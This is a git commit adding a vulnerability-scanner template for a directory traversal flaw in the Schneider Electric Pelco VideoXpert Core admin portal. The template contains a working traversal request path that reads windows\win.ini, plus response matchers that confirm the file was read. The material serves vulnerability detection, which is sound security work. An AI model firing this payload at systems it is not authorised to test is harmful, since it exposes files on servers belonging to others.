Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml

patch-1
Roberto Nunes 2022-09-10 19:33:14 +09:00 committed by GitHub
parent c4f36adbb6
commit 2a268f1324
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions

View File

@ -0,0 +1,23 @@
id: schneider-electric-pelco-videoxpert-core-admin-portal-lfi
info:
name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal
author: 0x_akoko
severity: high
description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
tags: windows,lfi,schneider
requests:
- method: GET
path:
- "{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini"
stop-at-first-match: true
matchers:
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body